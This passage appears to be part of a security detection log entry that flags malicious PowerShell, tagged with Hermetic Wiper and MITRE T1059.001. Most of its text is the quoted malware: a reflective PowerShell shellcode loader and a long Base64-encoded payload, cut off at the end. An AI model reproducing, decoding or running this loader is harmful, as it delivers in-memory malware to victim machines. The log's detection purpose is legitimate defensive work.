[\"Source:Endpoint\", \"Stage:Defense Evasion\"], \"impact\": 70, \"kill_chain_phases\": [\"Exploitation\"], \"mitre_attack\": [\"T1059\", \"T1059.001\"], \"observable\": [{\"name\": \"Computer\", \"role\": [\"Victim\"], \"type\": \"Hostname\"}, {\"name\": \"UserID\", \"role\": [\"Victim\"], \"type\": \"User\"}]}", annotations.analytic_story="Hermetic Wiper", annotations.analytic_story="Malicious PowerShell", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1059", annotations.mitre_attack="T1059.001", count="1", firstTime="2022-10-03T12:11:44", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-10-03T12:11:44", risk_message="A suspicious powershell script contains reflective class assembly command in function func_get_proc_address { Param ($var_module, $var_procedure) $var_unsafe_native_methods = ([AppDomain]::CurrentDomain.GetAssemblies() | Where-Object { $_.GlobalAssemblyCache -And $_.Location.Split('\\\\')[-1].Equals('System.dll') }).GetType('Microsoft.Win32.UnsafeNativeMethods') $var_gpa = $var_unsafe_native_methods.GetMethod('GetProcAddress', [Type[]] @('System.Runtime.InteropServices.HandleRef', 'string')) return $var_gpa.Invoke($null, @([System.Runtime.InteropServices.HandleRef](New-Object System.Runtime.InteropServices.HandleRef((New-Object IntPtr), ($var_unsafe_native_methods.GetMethod('GetModuleHandle')).Invoke($null, @($var_module)))), $var_procedure)) } function func_get_delegate_type { Param ( [Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters, [Parameter(Position = 1)] [Type] $var_return_type = [Void] ) $var_type_builder = [AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object System.Reflection.AssemblyName('ReflectedDelegate')), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMemoryModule', $false).DefineType('MyDelegateType', 'Class, Public, Sealed, AnsiClass, AutoClass', [System.MulticastDelegate]) $var_type_builder.DefineConstructor('RTSpecialName, HideBySig, Public', [System.Reflection.CallingConventions]::Standard, $var_parameters).SetImplementationFlags('Runtime, Managed') $var_type_builder.DefineMethod('Invoke', 'Public, HideBySig, NewSlot, Virtual', $var_return_type, $var_parameters).SetImplementationFlags('Runtime, Managed') return $var_type_builder.CreateType() } [Byte[]]$var_code = [System.Convert]::FromBase64String('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93h8qOV9fuB2qM+oZi8GIiMjo1oma6Dr3WOg2yJWJxDjfuB1ENUaVi9dE3Co5boI4ajr8toYbjdeA6lmK6k3HZAy1cjjwSchdx0iCfOoZjNlZRhWL6s3Il/xeKhmL7oI4fLbfX7gdqjPdXDcVivLXV0jI6DnL6bjVhaoNXQQ3KbxVQSuJzypK6PaHlYl5SMjacgxo9oMViblI3zIK6PaCFYg5SMOZBgdUfqqNRDjfH7gdqjPEOqm41ULqTcSo9l8ViXlJxIMyCqj2Q5WJ+UnEghiGOtRx8gpGGYrVDjlJyUeY4sgVtHcVjPcVi9zdctKXyMjoOczfuBJJXt+4Haoz3JycK58J3Wo06pW36p+2xh+L1UnEOPIG8sm0NzcqiWg5ScQ6qbcVQWoZisI5apmL6h+36jyoMEgqTc5qH4vricSETcgYqszGOxRxqh+26jgfXjq4Haoz3V0qNuuZN+o0hhmL1UnEOPICKjloOUnoMwnSSN5Vz8IVitwqG4rqPmgwCCpPyAg6RE/LWGrOhj0Ucp4qOR8fX7gdqjPos/TISMjdNwVEONFqmbXrl7ViEWIyxJzIyN6puNXLEljy6vJ3Nx6EOPKISIjI66mN97c3HPcVSfkpjfe3NwhIyIj3DZ7UyEzpuNWMtw2f1IhM3NJYsvVytzcesjqqB5/UyEzSSNJJ65m03Ooppve3Nyg4zNz3BXc9KbjV+xJI0krrmbXc6hm06DjY3PcFdz0puNXm65my3MslGbVSSdz3Fbb3BXcNk9TITOm41e9LJRm1XPLdTAiI6jbLJRm1XpzSSN0y6KuIiMslGbVoOcv8stzqGYrdNxTJ8tC0NzcoOcvpuNWMElhy+HK3Nx6dMsdMSIjyg3c3NyuZs9zLJRm1XN03Fbb3BXcNlNTITOm41Y/3DZ/UiEzc0liyxLK3Nx0yy8xIiOg5y/K2d3c3BDjY3zq4Haoz6LPIyIjI3V03FAv3FAr3FYvSSPcUDPcVitJI0kh3Ba/XSAz3Ba3XSAz3Ba7XSAz3DYfUyEzpuNXKxDjY8rmIyMj3DZ/UiEzoNsgLKaCIyMjqDCo4a5TIqkrY6fqVtoI5ZwjIiMjGOQsoKcjIyNLf/YhM3HLCDAiI6jTenqm1VdSdK6mI9zc3Ekjc8unryIjgkv2ITOqJYJP9iEzqmUnoOcvoOUqqOWuWyKpK2On6lbaCORzrqYj3NzcdXPLQFkiI66mI9zc3KDnL65bIqkrY6fqVtoI5GNzrqYj3Nzcc211yx1ZIiOg5y9wyz8jIyN6yDbcNn9SITNz3BBJZstky9z